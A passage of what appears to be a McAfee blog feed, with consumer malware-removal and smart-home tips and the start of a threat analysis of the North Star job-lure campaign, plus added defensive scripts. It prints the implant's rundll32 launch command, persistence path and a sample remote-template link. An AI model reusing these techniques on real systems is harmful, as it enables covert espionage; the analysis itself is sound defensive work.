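The download-swapping described in the last two sections, whether from a hijacked website or a rogue hotspot, is exactly what a published checksum defends against. The script below is an added example, not code from the original post: it compares a downloaded file’s SHA-256 digest with the value the vendor publishes. It assumes you obtained that digest through a separate, trusted channel (for example the vendor’s HTTPS page or a signed release note); a digest read from the same compromised page or network proves nothing.

```shell
#!/bin/sh
# Added example (not from the original post): verify that a downloaded file
# matches the SHA-256 digest the vendor publishes, so a file swapped in
# transit or served from a compromised mirror is caught before you run it.
# Assumption: the expected digest came from a separate trusted channel.

# sha256_of FILE: prints the lowercase hex digest using whichever tool exists
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1     # macOS ships shasum, not sha256sum
    fi
}

# verify_download FILE EXPECTED_SHA256: returns 0 on match, 1 on mismatch.
# The expected value is lowercased so a digest copied in upper case still works.
verify_download() {
    file=$1
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    actual=$(sha256_of "$file")
    if [ "$actual" = "$expected" ]; then
        echo "OK: $file matches the published SHA-256"
        return 0
    fi
    echo "MISMATCH: $file" >&2
    echo "  expected $expected" >&2
    echo "  actual   $actual" >&2
    return 1
}

# Usage (file name and digest are placeholders):
#   verify_download installer.dmg "<digest copied from the vendor's HTTPS page>"
```

Refuse to open or install the file on a mismatch, and re-download it over a network you trust before trying again; a mismatch on a download from a public hotspot is a reason to treat that network as hostile.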

Final Thoughts

Trojans can cause enormous problems before you even know what happened. Once one is on your system it can log your keystrokes, install additional malware and cause a variety of other problems you don’t want to face. Luckily, most Trojans are generic and easy to handle if you follow the removal steps above.

Unverified startup items and suspicious programs are the gateways through which Trojans install harmful code on your computer and other devices. If you notice a program running on your system that you did not install, it could be a Trojan. Try removing it and restarting the computer to see whether performance improves.

Removing Trojans (booting into safe mode, disabling untrusted startup items, uninstalling unknown programs and running a full antivirus scan) is a great way to safeguard your computer and privacy, but you must also take steps to avoid them in the future:

  • Set up cloud accounts using email addresses that offer account recovery support, such as accounts from your ISP or a paid service.
  • Apple, for example, lets you request assistance to recover an account; free webmail accounts can be harder to recover when the provider cannot confirm ownership.
  • Use a VPN on public Wi-Fi.
  • Call the sender before opening email attachments.
  • Use an antivirus solution with real-time protection.

Stay protected

The threat landscape is always changing, and attackers are always looking for new ways to break into computers and servers, so stay informed about the latest threats; using a proven antivirus solution is always a smart bet. These steps will not only safeguard your devices, they’ll also give you peace of mind online.

How to Wipe Out a Computer Virus https://www.mcafee.com/blogs/consumer/how-to-wipe-out-a-computer-virus/ https://www.mcafee.com/blogs/consumer/how-to-wipe-out-a-computer-virus/#respond Thu, 30 Jul 2020 15:20:50 +0000 /blogs/?p=104052

The post How to Wipe Out a Computer Virus appeared first on McAfee Blogs.

How to Wipe Out a Computer Virus

While some malicious programs are little more than a nuisance, many others can steal your most personal, private and sensitive information. In this article, you’ll learn some of the signs that you may have a computer virus, and tips for removing it effectively.

What is a computer virus?

Computer viruses take many forms. In general terms, a virus is unwanted code designed to invade and disrupt your computer; like a biological virus it invades, replicates itself by attaching to other programs or files, and then tries to spread to other systems. Some only affect your web browser. Others are far more harmful: a rootkit digs deep into the internal controls of your system to hide itself, and a Trojan sneaks onto your device disguised as a legitimate program.

Signs of a Virus

A sudden slowdown may be the first sign: programs that used to load quickly take longer and longer, and you may receive error messages about programs becoming unresponsive. The malware is using your computer’s processing power, so other programs struggle to run alongside it.

Some viruses and malware affect only certain parts of your system. You may discover that your browser’s home page has changed without your knowledge, or that you can no longer reach antivirus and antimalware websites. If malware gets into your email program, your contacts may start telling you about strange emails coming from your address.

How does a virus get on your computer?

Computer viruses have been around almost as long as personal computers, and their authors know that human error is the easiest way in. Strong antivirus software can block most threats, but it cannot stop a user from clicking the wrong link or installing compromised software. When you download programs or data from an unfamiliar site, you may also be unknowingly accepting malicious code; links in malicious emails can also start a download automatically.

New viruses appear all the time. Researchers at McAfee are constantly analysing new malicious programs and developing detections, but if you do not keep your virus definitions updated, a harmful program may still slip past your defences.

Removing a Computer Virus

Removing a computer virus manually is a complex process. Viruses may install themselves in several different parts of your system. If you do not completely eliminate the program, it may also reinstall itself at the next system reboot. In some cases, viruses play nasty tricks like invading the registry of a Windows system. Removing the wrong line in this database can then cause the entire system to fail. The easiest way to remove viruses is by using an antivirus program designed to clean your system safely. If a virus is already on your computer, however, you may need to run this program under very specific conditions.

Remove New Programs

If you’re lucky, the virus may just be sitting in a program you recently installed. On both Windows and Mac, you will want to uninstall recent apps and then remove new browser extensions. If you remove these programs and your computer promptly runs smoothly, you can breathe a sigh of relief. Of course you should still run a virus scan to make certain that your system is clean. You will also want to restart the computer to determine whether the malicious program reinstalls itself. If malicious messages pop up from the same program again, it points to a deeper infection.

Removing a Virus from a Windows Computer

In Windows computers, the virus removal process begins by booting up the computer in Safe mode. In this mode, your computer starts with only essential programs running. This prevents a viral program from starting up and blocking your antiviral scans. In older versions of Windows, you can access this mode by pressing the F8 button during the startup process.

In Windows 10, the process of opening in Safe mode is slightly more involved:

  1. Press the Windows button and click on Settings.
  2. Go to Update & Security and choose Recovery.
  3. Choose Restart Now under Advanced Startup.
    Your system will restart, but a new option screen will appear.
  4. Choose Troubleshoot.
  5. Go to Advanced Options and choose Startup Settings.
  6. Choose Enable Safe Mode.

Once your system restarts in safe mode, you will be able to run an on-demand viral scan. Because the number of viruses is always increasing, you may find it helpful to run several different scanning programs to catch any newer virus. It is important to use antiviral programs from reputable vendors so that you do not make the problem worse.

You should also follow these best practices:

• Backup your critical data
• Clean up temporary files and cached content
• Uninstall any/all applications no longer in use
• Update OS and remaining applications
• Check startup apps, disable unneeded apps
• Run the MMC (see above)
• Run a full Scan of the system

Removing a Virus from a Mac

For Mac computers, entering Safe mode is an even simpler process.

All you need to do is hold the shift button while the system boots up. If you’ve done this properly, you will see a “Safe Boot” message (Apple support content HT201262) on the login window. From there, you’ll run your virus removal programs and clean your system. For both Windows computers and Macs, you will want to run your virus scan multiple times to ensure that the system is clean.

Seek Professional Help

If you’ve gone through this process but are still struggling with a virus, you may need to call in a professional to clean your computer. For example, with McAfee Virus Removal Service, a security expert can remove stubborn viruses from your computer using a remote connection.

Avoiding Computer Viruses

The easiest way to remove computer viruses from your life is to avoid them in the first place.

It is vitally important to keep your system secure by following safe, Best Practices:

• Maintain backups of your data
• Clean up temporary files and cached content
• Uninstall applications no longer used
• Update OS and remaining applications
• Check startup apps, disable unneeded apps
• Verify Security subscription status
• Confirm Security software is up to date.
• Use trusted sources: Do not download software from a source you do not recognize. Do not run unsolicited programs.

And always Surf Safely using these tips:

• Use the WebAdvisor browser extension.
• Use VPN software while using untrusted networks.
• Use a password manager.
• Refrain from using the same usernames and passwords across web pages, especially financial or shopping sites.
• Set up cloud accounts using email addresses that offer account recovery support, such as accounts from ISPs or paid services.
• With Apple, you can request account recovery assistance (Gmail or Yahoo accounts can’t be recovered as they can’t confirm ownership).

Stay Protected

Professional security software is always a smart long-term investment in your computer system. You can keep both your data and identity safe while maintaining system performance. With the right program running in the background, your system will be ready to handle any and all of the threats inside your digital world.

Is Your Smart Home Vulnerable to a Hack Attack? https://www.mcafee.com/blogs/consumer/is-your-smart-home-vulnerable-to-a-hack-attack/ https://www.mcafee.com/blogs/consumer/is-your-smart-home-vulnerable-to-a-hack-attack/#respond Thu, 30 Jul 2020 15:20:47 +0000 /blogs/?p=104064


Is Your Smart Home Vulnerable to a Hack Attack?

Your smart home device creates a computer network which can function as your incredibly convenient garage door opener, appliance manager, lighting designer, In-House DJ, and even security system supervisor, among many other selected duties. Yet cybersecurity experts frequently caution that this ultra-convenient home network provided through your smart devices may be vulnerable to malicious hackers looking to gain access to your home, and your most private information. In addition, these experts consider the hacking of your smart devices a backdoor to your most important information.

So while this is certainly an unfortunately real possibility, taking the time to use a few tips in this article can go a long way to stopping hackers before they start, and keeping your smart home devices safe and secure.

Can smart home devices be hacked?

The short answer is, unfortunately, yes. Along with the widespread popularity of smart home devices, a recent trend in hackers using IoT technology to spy on businesses, launch attacks, and deliver malware to your home network is a modern reality that users need to be fully aware of when setting up their smart home systems.

What can I expect if my smart devices get hacked?

With a physical home break-in, alert neighbors may notice and call the police, but a hacker has the advantage of working in secret. With access to your private information, savvy hackers may be able to steal sensitive information, or — in a worst case scenario — commit identity theft that can cause financial fallout. When you consider the array of smart toys and gadgets that provide electronic entertainment, education, communication and convenience for your family, you may also discover a number of vulnerabilities that hackers can exploit to break in to your home.

Where do the biggest home threats exist?

Because of their 24/7 potential access, smart devices which you run continuously—thermostat, lighting, security, et al. — may pose more risk than those which you only use on occasion. Your home office computer and router are likely the most exposed targets, but your living room and bedroom may also contain any number of smart gadgets that a sharp hacker may attempt to exploit as well. Your smart TV, tablet, cell phones, alarm clocks, watches, sleep monitors and streaming gadgets can also make your bedroom a relatively open opportunity for hackers.

Both your living room and kitchen—smart TV’s, tablets, refrigerators, coffee machines, ovens, etc. — also offer connections which are easy to ignore when it comes to cybersecurity. And when assessing potential threats, do not neglect your children’s playroom with its smart toys, tablets or baby monitors. Be sharp and consider that any smart device can offer an opening.

Does hacking pose a severe threat?

Short answer? It does. The potential risk should reasonably grab your attention when you understand that all your smart devices have a direct connection to your smartphone, or even the internet. Awareness of this situation should sharpen your understanding of exactly how much effort goes into hacking attempts to break into the interconnected network that links your smart devices.

Does a password protect my smart devices from hacking?

The Cybersecurity and Infrastructure Security Agency (CISA) offers specific guidelines on the best ways to protect your identity and possessions from the intrusive and persistent efforts of hackers. The guidelines apply to devices that connect to each other and to the internet, providing stringent guidance.

As a savvy computer user, you probably know that each device has a factory default password. What you may not know, however, is that you must change this default password. Always take the time to change default passwords, and make sure to create long, unique passwords that can best defeat any efforts to crack them.

What are some practical things I can do to secure my smart devices?

Remember that while it may take some extra effort to create a second Wi-Fi network dedicated to your smart devices, this effort will provide significant benefits. You can help confine any network intrusions to a separate network that does not have access to your bank, or private, sensitive financial information. And these simple steps can also make a significant difference in protecting your smart home systems:

  • Thoroughly research the device brand then choose one that has a proven security track record.
  • Keep the product software up to date. Always set your device to auto-update if possible so you always run the latest, safest software.
  • Most every device will come with a factory default password. Remember to take the time to go in and create a long and unique password for each device.
  • Choose the privacy settings that you’re comfortable with, instead of the blanket permissions that come with the devices.
  • Unplug any/every smart gadget when not in use.
  • Install cloud-integrated antivirus software for your router that protects every electronic device in your home.

Stay protected

When you actively participate in creating your home’s security profile, you take ownership that generates interest, knowledge, and ultimately, security. Stay a step ahead by staying informed, and your smart home can remain a smart choice!

The post Is Your Smart Home Vulnerable to a Hack Attack? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/is-your-smart-home-vulnerable-to-a-hack-attack/feed/ 0
Operation (노스 스타) North Star A Job Offer That’s Too Good to be True? https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/#respond Thu, 30 Jul 2020 04:14:38 +0000 /blogs/?p=103224

Executive Summary

We are in the midst of an economic slump [1], with more candidates than there are jobs, something that has been leveraged by malicious actors to lure unwitting victims into opening documents laden with malware. While the prevalence of attacks during this unprecedented time has been largely carried out by low-level fraudsters, the more capable threat actors have also used this crisis as an opportunity to hide in plain sight.

One such example is an increase in malicious cyber activity targeting the Aerospace & Defense industry that McAfee Advanced Threat Research (ATR) observed. In this 2020 campaign McAfee ATR discovered a series of malicious documents containing job postings taken from leading defense contractors to be used as lures, in a very targeted fashion. These malicious documents were intended to be sent to victims in order to install a data gathering implant. The victimology of these campaigns is not clear at this time; however, based on the job descriptions, they appear to be targeting people with skills and experience relating to the content in the lure documents. The campaign appears to be similar to activity reported elsewhere by the industry; however, upon further analysis the implants and lure documents in this campaign are distinctly different [2], thus we can conclude this research is part of a different activity set. This campaign is utilizing compromised infrastructure from multiple European countries to host its command and control infrastructure and distribute implants to the victims it targets.

This type of campaign has appeared before in 2017 and 2019 using similar methods with the goal of gathering intelligence surrounding key military and defense technologies [3]. The 2017 campaign also used lure documents with job postings from leading defense contractors; this operation was targeting individuals employed by defense contractors used in the lures. Based on some of the insight gained from spear phishing emails, the mission of that campaign was to gather data around certain projects being developed by their employers.

The Techniques, Tactics and Procedures (TTPs) of the 2020 activity are very similar to those previous campaigns operating under the same modus operandi that we observed in 2017 and 2019. From our analysis, this appears a continuation of the 2019 campaign, given numerous similarities observed. These similarities are present in both the Visual Basic code used to execute the implant and some of the core functionality that exists between the 2019 and 2020 implants.

Thus, the indicators from the 2020 campaign point to previous activity from 2017 and 2019 that was previously attributed to the threat actor group known as Hidden Cobra [4]. Hidden Cobra is an umbrella term used to refer to threat groups attributed to North Korea by the U.S. Government [1]. Hidden Cobra consists of threat activity from groups the industry labels as Lazarus, Kimsuky, KONNI and APT37. The cyber offensive programs attributed to these groups, targeting organizations around the world, have been documented for years. Their goals have ranged from gathering data around military technologies to cryptocurrency theft from leading exchanges.

Our analysis indicates that one of the purposes of the activity in 2020 was to install data gathering implants on victims’ machines. These DLL implants were intended to gather basic information from the victims’ machines with the purpose of victim identification. The data collected from the target machine could be useful in classifying the value of the target. McAfee ATR noticed several different types of implants were used by the adversary in the 2020 campaigns.

These campaigns affect the security of South Korea and of foreign nations. In this blog McAfee ATR analyzes multiple campaigns conducted in the first part of 2020.

Finally, we see the adversary expanding the false job recruitment campaign to other sectors outside of defense and aerospace, such as a document masquerading as a finance position for a leading animation studio.

In this blog we will cover:

Target of Interest – Defense & Aerospace Campaign

This is not the first time that we have observed threat actors using the defense and aerospace industry as lures in malicious documents. In 2017 and 2019, there were efforts to send malicious documents to targets that contained job postings for positions at leading defense contractors [3].

The objective of these campaigns was to gather information on specific programs and technologies. Like the 2017 campaign, the 2020 campaign also utilized legitimate job postings from several leading defense and aerospace organizations. In the 2020 campaign that McAfee ATR observed, some of the same defense contractors from the 2017 operation were again used as lures in malicious documents.

This new activity noted in 2020 uses similar Techniques, Tactics and Procedures (TTPs) to those seen in a 2017 campaign that targeted individuals in the Defense Industrial Base (DIB). The 2017 activity was included in an indictment by the US government and attributed to the Hidden Cobra threat group [4].

Attack Overview

Phase One: Initial Contact

This recent campaign used malicious documents to install malware on the targeted system using a template injection attack. This technique allows a weaponized document to download an external Word template containing macros that will be executed. This is a known trick used to bypass static malicious document analysis, as well as detection, as the macros are embedded in the downloaded template.

Further, these malicious Word documents contained content related to legitimate jobs at these leading defense contractors. All three organizations have active defense contracts of varying size and scope with the US government.

The timeline for these documents, that were sent to an unknown number of targets, ran between 31 March and 18 May 2020.

Document creation timeline

Malign documents were the main entry point for introducing malicious code into the victim’s environment. These documents contained job descriptions from defense, aerospace and other sectors as a lure. The objective would be to send these documents to a victim’s email with the intention they open, view and ultimately execute the payload.

As we mentioned, the adversary used a technique called template injection. When a document contains the .docx extension, in our case, it means that we are dealing with the Open Office XML standard. A .docx file is a zip file containing multiple parts. Using the template injection technique, the adversary puts a link towards the template file in one of the .XML files, for example the link is in settings.xml.rels while the external oleobject load is in document.xml.rels. The link will load a template file (DOTM) from a remote server. This is a clever technique we observe being used by multiple adversaries [5] and is intended to make a document appear to be clean initially, only to subsequently load malware. Some of these template files are renamed as JPEG files when hosted on a remote server to avoid any suspicion and bypass detection. These template files contain Visual Basic macro code, that will load a DLL implant onto the victim’s system. Current McAfee technologies currently protect against this threat.

We mentioned earlier that docx files (like xlsx and pptx) are part of the OOXML standard. The document defining this standard [6] describes, with examples, the syntax and values that can be used. An interesting file to look at is the ‘settings.xml’ file that can be discovered in the ‘Word’ container of the docx zip file. This file contains settings with regards to language, markup and more. First, we extracted all the data from the settings.xml files and started to compare. All the documents below contained the same language values:

w:val="en-US"
w:eastAsia="ko-KR"

The XML file ends with a GUID value that starts with the value “w15”.

Example: w15:val="{932E534D-8C12-4996-B261-816995D50C69}"/></w:settings>

According to the Microsoft documentation, w15 defines the PersistentDocumentId Class. When the object is serialized out as xml, its qualified name is w15:docId. The 128-bit GUID is set as an ST_Guid attribute which, according to the Microsoft documentation, refers to a unique token. The used class generates a GUID for use as the DocID and generates the associated key. The client stores the GUID in that structure and persists in the doc file. If, for example, we would create a document and would “Save As”, the w15:docId GUID would persist across to the newly created document. What would that mean for our list above? Documents with the same GUID value need to be placed in chronological order and then we can state the earliest document is the root for the rest, for example:

What we can say from the above table is that “_IFG_536R.docx” was the first document we observed and that later documents with the same docID value were created from the same base document.

To add to this assertion; in the settings.xml file the value “rsid” (Revision Identifier for Style Definition) can be found. According to Microsoft’s documentation: “This element specifies a unique four-digit number which shall be used to determine the editing session in which this style definition was last modified. This value shall follow this following constraint: All document elements which specify the same rsid* values shall correspond to changes made during the same editing session. An editing session is defined as the period of editing which takes place between any two subsequent save actions.”

Let’s start with the rsid element values from “*_IFG_536R.docx”:

And compare with the rsid element values from “*_PMS.docx”:

The rsid elements are identical for the first four editing sessions for both documents. This indicates that these documents, although they are now separate, originated from the same document.

Digging into more values and metadata (we are aware they can be manipulated), we created the following overview in chronological order based on the creation date:

When we zoom in on the DocID “932E534d(..) we read the value of a template file in the XML code: “Single spaced (blank).dotx” – this template name seems to be used by multiple “Author” names. The revision number indicates the possible changes in the document.

Note: the documents in the table with “No DocID” were the “dotm” files containing the macros/payload.

All files were created with Word 2016 and had both the English and Korean languages installed. This analysis into the metadata indicates that there is a high confidence that the malicious documents were created from a common root document.
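The two checks described above, the external template link in settings.xml.rels and the docId/rsid metadata in settings.xml, can be scripted for triage. The following Python is an added example written for this write-up, not McAfee ATR's tooling. It builds small .docx files in memory (constructed samples, with a placeholder host template-host.invalid and made-up docId and rsid values), then reports any externally sourced template, the language settings, the w15:docId and the rsid list, and counts how many leading editing sessions two documents share, which is the comparison used above to tie lures to a common root document.

```python
"""Triage helper for OOXML Word documents: flags remote-template links
(template injection) and extracts docId / language / rsid metadata.
Added example, not McAfee tooling. All sample documents are constructed."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
NS_W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
NS_W15 = "http://schemas.microsoft.com/office/word/2012/wordml"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
REL_TEMPLATE = NS_R + "/attachedTemplate"


def build_sample_docx(template_target, doc_id, rsids, external=True):
    """Construct a minimal .docx (only the two parts the analysis needs)."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        f'<Relationships xmlns="{NS_PKG}">'
        f'<Relationship Id="rId1" Type="{REL_TEMPLATE}" Target="{template_target}"{mode}/>'
        "</Relationships>"
    )
    rsid_xml = "".join(f'<w:rsid w:val="{r}"/>' for r in rsids)
    settings = (
        f'<w:settings xmlns:w="{NS_W}" xmlns:w15="{NS_W15}" xmlns:r="{NS_R}">'
        '<w:attachedTemplate r:id="rId1"/>'
        f'<w:rsids><w:rsidRoot w:val="{rsids[0]}"/>{rsid_xml}</w:rsids>'
        '<w:themeFontLang w:val="en-US" w:eastAsia="ko-KR"/>'
        f'<w15:docId w15:val="{doc_id}"/>'
        "</w:settings>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def analyze_docx(data):
    """Return external template targets plus docId, language and rsid metadata."""
    report = {"external_templates": [], "doc_id": None, "lang": {}, "rsids": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        # Any .rels part may carry the link; this campaign used settings.xml.rels
        for name in names:
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{NS_PKG}}}Relationship"):
                if rel.get("TargetMode") == "External" and rel.get("Type") == REL_TEMPLATE:
                    report["external_templates"].append(rel.get("Target"))
        if "word/settings.xml" in names:
            s = ET.fromstring(z.read("word/settings.xml"))
            doc_id = s.find(f"{{{NS_W15}}}docId")
            if doc_id is not None:
                report["doc_id"] = doc_id.get(f"{{{NS_W15}}}val")
            lang = s.find(f"{{{NS_W}}}themeFontLang")
            if lang is not None:
                report["lang"] = {k.split("}")[1]: v for k, v in lang.attrib.items()}
            # w:rsid entries, one per editing session, in order
            report["rsids"] = [r.get(f"{{{NS_W}}}val") for r in s.iter(f"{{{NS_W}}}rsid")]
    return report


def is_template_injection(report):
    """True when the attached template is fetched over http(s)."""
    return any(urlparse(t).scheme in ("http", "https") for t in report["external_templates"])


def shared_editing_sessions(report_a, report_b):
    """Count leading rsid values common to both documents (shared history)."""
    n = 0
    for a, b in zip(report_a["rsids"], report_b["rsids"]):
        if a != b:
            break
        n += 1
    return n


if __name__ == "__main__":
    # Constructed values: placeholder host, placeholder GUID, invented rsids
    base = ["00A1B2C3", "00D4E5F6", "001A2B3C", "004D5E6F"]
    lure_a = build_sample_docx("http://template-host.invalid/17.jpg",
                               "{00000000-0000-0000-0000-000000000001}", base + ["007A8B9C"])
    lure_b = build_sample_docx("http://template-host.invalid/43.jpg",
                               "{00000000-0000-0000-0000-000000000001}", base + ["00FF0011"])
    ra, rb = analyze_docx(lure_a), analyze_docx(lure_b)
    print("template injection:", is_template_injection(ra), ra["external_templates"])
    print("same docId:", ra["doc_id"] == rb["doc_id"], "lang:", ra["lang"])
    print("shared editing sessions:", shared_editing_sessions(ra, rb))
```

Run on a real document, the same functions apply unchanged to the bytes of any .docx; a document whose attachedTemplate relationship points at an http(s) target is the case described above, and a docId match plus a long shared rsid prefix is the metadata signal that the lures were cut from one root.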

Document Templates

There were several documents flagged as non-malicious discovered during our investigation. At first glance they did not seem important or related at all, but deeper investigation revealed how they were connected. These documents played a role in building the final malicious documents that ultimately got sent to the victims. Further analysis of these documents, based on metadata information, indicated that they contained relationships to the primary documents created by the adversary.

Two PDF files (***_SPE_LEOS and ***_HPC_SE) with aerospace & defense industry themed images, created via the Microsoft Print to PDF service, were submitted along with ***_ECS_EPM.docx. The naming convention of these PDF files was very similar to the malicious documents used. The name includes abbreviations for positions at the defense contractor much like the malicious documents. The Microsoft Print to PDF service enables content from a Microsoft Word document to be printed to PDF directly. In this case these two PDF files were generated from an original Microsoft Word document with the author ‘HOME’. The author ‘HOME’ appeared in multiple malicious documents containing job descriptions related to aerospace, defense and the entertainment industry. The PDFs were discovered in an archive file indicating that LinkedIn may have been a possible vector utilized by the adversaries to target victims. This is a similar vector to what has been observed in a campaign reported by industry [7]; however, as mentioned earlier, the research covered in this blog is part of a different activity set.

Metadata from PDF file submitted with ***_ECS_EPM.docx in archive with context fake LinkedIn

Visual Basic Macro Code

Digging into the remote template files reveals some additional insight concerning the structure of the macro code. The second stage remote document template files contain Visual Basic macro code designed to extract a double base64 encoded DLL implant. The content is all encoded in UserForm1 in the remote DOTM file that is extracted by the macro code.

Macro code (17.dotm) for extracting embedded DLL

Further, the code will also extract the embedded decoy document (a clean document containing the job description) to display to the victim.

Code (17.dotm) to extract clean decoy document

Macro code (******_dds_log.jpg) executed upon auto execution

Phase Two: Dropping Malicious DLLs

The adversary used malicious DLL files, delivered through stage 2 malicious documents, to spy on targets. Those malicious documents were designed to drop DLL implants on the victim’s machine to collect initial intelligence. In this campaign the adversary was utilizing patched SQLite DLLs to gather basic information from its targets. These DLLs were modified to include malicious code to be executed on the victim’s machine when they’re invoked under certain circumstances. The purpose of these DLLs was to gather machine information from infected victims that could be used to further identify more interesting targets.

The first stage document sent to targeted victims contained an embedded link that downloaded the remote document template.

Embedded link contained within Word/_rels/settings.xml.rels

The DOTM (Office template filetype) files are responsible for loading the patched DLLs onto the victim’s machine to collect and gather data. These DOTM files are created with DLL files encoded directly into the structure of the file. These DOTM files exist on remote servers compromised by the adversary; the first stage document contains an embedded link that refers to the location of this file. When the victim opens the document, the remote DOTM file, which contains Visual Basic macro code to load the malicious DLLs, is loaded. Based on our analysis, these DLLs were first seen on 20 April 2020 and, to our knowledge based on age and prevalence data, these implants have been customized for this attack.

The workflow of the attack can be represented by the following image:

To identify the malicious DLLs that will load or download the final implant, we extracted from the Office files found in the triage phase, the following DLL files:

SHA256                                                            Original file name  Compile date
bff4d04caeaf8472283906765df34421d657bd631f5562c902e82a3a0177d114  wsuser.db           4/24/2020
b76b6bbda8703fa801898f843692ec1968e4b0c90dfae9764404c1a54abf650b  unknown             4/24/2020
37a3c01bb5eaf7ecbcfbfde1aab848956d782bb84445384c961edebe8d0e9969  onenote.db          4/01/2020
48b8486979973656a15ca902b7bb973ee5cde9a59e2f3da53c86102d48d7dad8  onenote.db          4/01/2020

These DLL files are patched versions of goodware libraries, like the SQLITE library found in our analysis, and are loaded via a VBScript contained within the DOTM files that loads a double Base64 encoded DLL as described in this analysis. The DLL is encoded in UserForm1 (contained within the Microsoft Word macro) and the primary macro code is responsible for extracting and decoding the DLL implant.

DOTM Document Structure

Implant DLLs encoded in UserForm1

From our analysis, we could verify how the DLLs used in the third stage were legitimate software with a malicious implant inside that would be enabled every time a specific function was called with a set of parameters.

Analyzing the sample statically, it was possible to extract the legitimate software used to store the implant; for example, one of the DLL files extracted from the DOTM files was a patched SQLITE library. If we compare the original library with the extracted DLL, we can spot a lot of similarities across the two samples:

Legitimate library to the left, malicious library to the right

As mentioned, the patched DLL and the original SQLITE library share a lot of code:

Both DLLs share a lot of code internally

The first DLL stage needs certain parameters in order to be enabled and launched in the system. The macro code of the Office files we analyzed, contained part of these parameters:

Information found in the pcode of the document

The data found in the VBA macro had the following details:

  • 32-bit keys that mimic a Windows SID
    • The first parameter belongs to the decryption key used to start the malicious activity.
    • This could be chosen by the author to make the value more realistic
  • Campaign ID

DLL Workflow

The analysis of the DLL extracted from the ‘docm’ files (the 2nd stage of the infection) revealed the existence of two types of operation for these DLLs:

DLL direct execution:

  • The DLL unpacks a new payload in the system.

Drive-by DLLs:

  • The DLL downloads a new DLL implant from a remote server delivering an additional DLL payload into the system.

For both methods, the implant starts collecting the target information and then contacts the command and control (C2) server.

We focused our analysis into the DLLs files that are unpacked into the system.

Implant Analysis

The DLL implant will be executed after the user interacts by opening the Office file. As we explained, the p-code of the VBA macro contains parts of the parameters needed to execute the implant on the system.

The new DLL implant file will be unpacked (depending on the campaign ID) inside a folder within the AppData folder of the user in execution:

C:\Users\user\AppData\Local\Microsoft\Notice\wsdts.db

The DLL file must be launched with 5 different parameters if we want to observe the malicious connection to the C2 domain; in our analysis we observed how the DLL was launched with the following command line:

C:\Windows\System32\rundll32.exe “C:\Users\user\AppData\Local\Microsoft\Notice\wsdts.db”, sqlite3_steps S-6-81-3811-75432205-060098-6872 0 0 61 1

The required parameters to launch the malicious implant are:

Parameter number Description
1 Decryption key
2 Unused value, hardcoded in the DLL
3 Unused value, hardcoded in the DLL
4 Campaign identifier
5 Unused value, hardcoded in the DLL

 

As we explained, the implants are patched SQLITE files and that is why we could find additional functions that are used to launch the malicious implant, executing the binary with certain parameters. It is necessary to use a specific export ‘sqlite3_steps’ plus the parameters mentioned before.

Analyzing the code statically we could observe that the payload only checks 2 of these 5 parameters but all of them must be present in order to execute the implant:

sqlite malicious function

Phase Three: Network Evasion Techniques

Attackers are always trying to remain undetected in their intrusions which is why it is common to observe techniques such as mimicking the same User-Agent that is present in the system, in order to remain under the radar. Using the same User-Agent string from the victim’s web browser configurations, for example, will help avoid network-based detection systems from flagging outgoing traffic as suspicious. In this case, we observed how, through the use of the Windows API ObtainUserAgentString, the attacker obtained the User-Agent and used the value to connect to the command and control server:

If the implant cannot detect the User-Agent in the system, it will use the default Mozilla User-Agent instead:

Running the sample dynamically and intercepting the TLS traffic, we could see the connection to the command and control server:

Unfortunately, during our analysis, the C2 was not active which limited our ability for further analysis.

The data sent to the C2 channel contains the following information:

Parameter          Description
C2                 C2 configured for that campaign
ned                Campaign identifier
key 1              AES key used to communicate with the C2
key 2              AES key used to communicate with the C2
sample identifier  Sample identifier sent to the C2 server
gl                 Size value sent to the C2 server
hl                 Unknown parameter, always set to 0

We could find at least 5 different campaign IDs in our analysis, which suggests that the analysis in this document is merely the tip of the iceberg:

Template file                          Campaign ID
61.dotm                                0
17.dotm                                17
43.dotm                                43
83878C91171338902E0FE0FB97A8C47A.dotm  204
******_dds_log                         100

Phase Four: Persistence

In our analysis we observed how the adversary ensures persistence by delivering an LNK file into the startup folder.

The value of this persistent LNK file is hardcoded inside every sample:

Dynamically, and through the Windows APIs NtCreateFile and NtWriteFile, the LNK is written in the startup folder. The LNK file contains the path to execute the DLL file with the required parameters.
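The three behaviours described in phases two to four (rundll32 loading the SQLite-disguised implant with its five parameters, the implant beaconing from inside rundll32 regardless of which User-Agent it copies, and the LNK written into the Startup folder) can each be checked in endpoint telemetry. The following is an added example written for this write-up, not code from McAfee ATR: three simple rules run over constructed Sysmon-style event records. The event shape, field names, parent processes, host paths and the benign events are assumptions made for the demonstration; the rundll32 command line and the Startup folder path follow the analysis above.

```python
"""Endpoint detection rules for the implant behaviours described above,
run over constructed Sysmon-style event records.

Added example, not code from the McAfee ATR write-up. Event shape, field
names, parent processes, host paths and the benign events are assumptions
made for this demonstration; the rundll32 command line and the Startup
folder LNK follow the analysis above."""
import re
from pathlib import PureWindowsPath

# Constructed events: id 1 = process create, 3 = network connection,
# 11 = file create (mirrors the Sysmon event ids for those categories).
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Microsoft\Notice\wsdts.db", sqlite3_steps S-6-81-3811-75432205-060098-6872 0 0 61 1'},
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe",
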